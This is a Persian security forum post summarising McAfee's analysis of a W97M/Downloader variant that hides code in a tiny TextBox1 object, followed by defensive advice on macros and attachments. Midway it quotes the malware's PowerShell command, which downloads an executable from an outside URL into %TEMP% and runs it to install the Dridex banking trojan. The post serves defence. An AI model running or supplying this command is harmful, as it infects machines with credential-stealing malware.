رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

در حالی که بدافزارهای ماکرویی روزهای اوجشان را سپری می کنند نویسندگان این نوع بدافزارها همچنان در حال خلق راه های جدید برای بالا بردن احتمال اجرا شدن فایل های حاوی ماکروهای مخرب توسط کاربران هستند.

 محققان شرکت McAfee بتازگی گونه جدیدی از بدافزار W97M/Downloader را شناسایی کرده اند که از تکنیکی جدید برای مخفی نمودن اهداف مخرب خود استفاده می کند.

انتشار این بدافزار از حدود یک سال پیش، از طریق فایل های Microsoft Office XML حاوی اشیاء (Object) فشرده شده MSO ActiveMime آغاز شد. این اشیاء یک شئی رمز شده OLE را باز می کردند که به همراه کدهای چند ماکرو بر روی دستگاه قربانی اجرا می شد.

حالا محققان شرکت McAfee از اضافه شدن دو لایه حفاظتی جدید زیر در بدافزار W97M/Downloader خبر داده اند:

  • سند XML مخرب در یک شئی چندبخشی MIME مخفی شده و در قالب فایل های DOC یا RTF از طریق هرزنامه ها منتشر می شود. به محض باز کردن پیوست این هرزنامه ها کد مخرب جاسازی شده در OLE اجرا می شود.
  • کدی که عهده دار وظیفه دانلود و اجرای کد بدافزار اصلی است دیگر در ماکرو نیست. در عوض در شئی ای با عنوان TextBox1 جاسازی شده است.

textbox1-1-768x436.png

همانطور که در تصویر بالا نشان داده شده کد مخرب در مشخصه (Attribute)های Value و Text شئی TextBox1 جاسازی شده است و بنابراین در ماکرو قابل روئیت نیست.

اندازه TextBox1 بسیار کوچک بوده و در تصویر بالا برای نشان دادن عملکرد بزرگ شده است.

ThisDocument-1.png

module1-1.png

ماکروهای دیگری نیز در سند موجود هستند که عملکرد آنها تنها فراخوانی کدهای درون TextBox1 است.

با فراخوانی TextBox1 بدافزار با استفاده از پروسه مجاز PowerShell فرمان زیر را به منظور دانلود و نصب بدافزار اصلی که یک بدافزار بانکی با عنوان Dridex است اجرا می کند:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://raspberry.diversified-capital-management.com/zalupa/kurva.php’,’%TEMP%\sdjgbcjkds.exe’);Start-Process‘%TEMP%\sdjgbcjkds.exe’;

در این مرحله بدافزار Dridex بطور کامل کنترل دستگاه کاربر را در دست می گیرد.

برای مقابله با این بدافزارها رعایت موارد زیر توصیه می شود:

  • از ضدویروس قدرتمند و به روز استفاده کنید. گونه جدید W97M/Downloader توسط ضدویروس McAfee با به روز رسانی DAT ۸۰۹۷ و بالاتر شناسایی می شود.
    بخش Macro را در نرم افزار Office برای کاربرانی که به این قابلیت نیاز کاری ندارند با فعال کردن گزینه “Disable all macros without notification” غیر فعال کنید. برای غیرفعال کردن این قابلیت، از طریق Group Policy، از این راهنما استفاده کنید.
    در صورت فعال بودن گزینه “Disable all macros with notification” در نرم افزار Office، در زمان باز کردن فایل های Macro پیامی ظاهر شده و از کاربر می خواهد برای استفاده از کدهای بکار رفته در فایل، تنظیمات امنیتی خود را تغییر دهند. آموزش و راهنمایی کاربران سازمان به صرف نظر کردن از فایل های مشکوک و باز نکردن آنها می تواند نقشی مؤثر در پیشگیری از اجرا شدن این فایل ها داشته باشد.
    ایمیل های دارای پیوست Macro را در درگاه شبکه مسدود کنید. بدین منظور می توانید از تجهیزات دیواره آتش، همچون Sophos UTM بهره بگیرید.
    سطح دسترسی کاربران را محدود کنید. بدین ترتیب حتی در صورت اجرا شدن فایل مخرب توسط کاربر، دستگاه به بدافزار آلوده نمی شود.
  •  
 
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...